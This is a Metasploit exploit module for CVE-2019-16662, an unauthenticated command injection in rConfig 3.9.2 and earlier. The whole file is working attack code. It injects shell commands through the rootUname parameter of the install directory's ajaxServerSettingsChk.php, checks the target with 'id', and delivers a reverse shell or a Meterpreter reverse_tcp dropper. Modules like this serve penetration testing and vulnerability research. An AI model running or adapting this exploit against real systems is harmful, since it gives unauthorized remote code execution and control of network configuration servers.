## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'rConfig install Command Execution', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in rConfig versions 3.9.2 and prior. The `install` directory is not automatically removed after installation, allowing unauthenticated users to execute arbitrary commands via the `ajaxServerSettingsChk.php` file as the web server user. This module has been tested successfully on rConfig version 3.9.2 on CentOS 7.7.1908 (x64). }, 'License' => MSF_LICENSE, 'Author' => [ 'mhaskar', # Discovery and exploit 'bcoles' # Metasploit ], 'References' => [ ['CVE', '2019-16662'], ['EDB', '47555'], ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'], ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/'] ], 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Payload' => {'BadChars' => "\x00\x0a\x0d\x26"}, 'Targets' => [ ['Automatic (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}, 'Type' => :unix_memory ], ['Automatic (Linux Dropper)', 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'}, 'Type' => :linux_dropper ] ], 'Privileged' => false, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'DisclosureDate' => '2019-10-28', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/']) ]) end def check res = execute_command('id') unless res vprint_error 'Connection failed' return CheckCode::Unknown end if res.code == 404 vprint_error 'Could not find install directory' return CheckCode::Safe end cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first unless cmd_res return CheckCode::Safe end vprint_status "Response: #{cmd_res}" unless cmd_res.include?('uid=') return CheckCode::Detected end CheckCode::Vulnerable end def execute_command(cmd, opts = {}) vprint_status "Executing command: #{cmd}" send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'), 'vars_get' => {'rootUname' => ";#{cmd} #"} }, 5) end def exploit unless [CheckCode::Detected, CheckCode::Vulnerable].include? check fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable" end case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager(:linemax => 1_500) end end end